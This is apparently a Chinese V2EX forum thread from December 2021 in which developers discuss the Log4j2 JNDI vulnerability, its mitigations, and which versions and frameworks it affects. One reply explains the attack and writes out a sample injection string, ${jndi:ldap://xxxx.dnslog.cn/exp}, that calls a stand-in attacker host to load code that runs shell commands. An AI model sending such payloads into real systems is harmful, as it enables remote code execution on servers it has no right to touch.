log4j2 的漏洞大家今天晚上修复吗?

2021-12-10 00:16:50 +08:00
 Jooooooooo

没想到继 fastjson 之后还有这一出.

15150 次点击
所在节点    程序员
82 条回复
ixx
2021-12-10 10:59:51 +08:00
@play78 #11 可以看一下项目 maven 依赖 我看 springboot 2.x 默认使用的不是 log4j
rayhy
2021-12-10 11:03:09 +08:00
@justs0o 最新消息: https://mp.weixin.qq.com/s/AuBchaUvFw2pisVw6rNX5A

Apache Log4j 2.15.0-rc1 版本存在漏洞绕过,请及时更新至 Apache Log4j 2.15.0-rc2 版本
Jwyt
2021-12-10 11:03:38 +08:00
@play78 不是吧 我记得 springboot 默认日志不是 slf4j + logback 么
dreamramon
2021-12-10 11:04:03 +08:00
加了环境变量了,不知道顶不顶得住。
Jwyt
2021-12-10 11:04:36 +08:00
@learningman 谁告诉你 logback 依赖 log4j 的?
ixx
2021-12-10 11:05:28 +08:00
@jinzhongyuan #13 通俗点说一下问题

一般代码里会记录请求参数 如登录时记录 log.info("user:{} is login", name); 这个 name 是前台传过来的参数

如果前台传的是构造的参数如: ${jndi:ldap://xxxx.dnslog.cn/exp}

exp 返回的是一个构造方法里执行 shell 代码的 class 文件

然后你设置的什么命令服务器接收到参数后就执行这个命令了
aoizz
2021-12-10 11:08:31 +08:00
@MonkeyJon #10 spring-boot-starter-web 里面排除 log4j-to-slf4j 就好了
MonkeyJon
2021-12-10 11:34:41 +08:00
@aoizz 应该是
adamwhite
2021-12-10 11:42:54 +08:00
@aoizz ... 麻了,那家公司只有一个后端的,几十个工程都要处理
wbd31
2021-12-10 11:48:54 +08:00
funway
2021-12-10 11:51:44 +08:00
@ixx 👍
感谢大佬,好像懂了
RuzZ
2021-12-10 12:03:53 +08:00
@wbd31 没用配置 jms appender ,应该就没有影响吧
RuzZ
2021-12-10 12:05:30 +08:00
RuzZ
2021-12-10 12:07:25 +08:00
@RuzZ 根据 quote 的内容,log4j1.x 不支持 lookup ,也找不到 JNDI 的相关引用,感觉是可以理解为 log4j 1.x 不受此次 bug 的影响
adamwhite
2021-12-10 12:14:00 +08:00
可以通过关闭日志暂时屏蔽问题么?
Lemeng
2021-12-10 12:43:33 +08:00
大厂加油
sadfQED2
2021-12-10 13:02:41 +08:00
哈哈哈,非 java boy 开心吃瓜
iold
2021-12-10 13:03:58 +08:00
arthas2234
2021-12-10 14:05:58 +08:00
@wbd31 不会吧,现在蔓延到 1.x 了么,不过我负责的项目是在内网的,还可以观望一下
play78
2021-12-10 14:08:46 +08:00
@arthas2234 让网管在防火墙上把 ldap 协议禁止了。估计还可以继续苟。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/821217

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX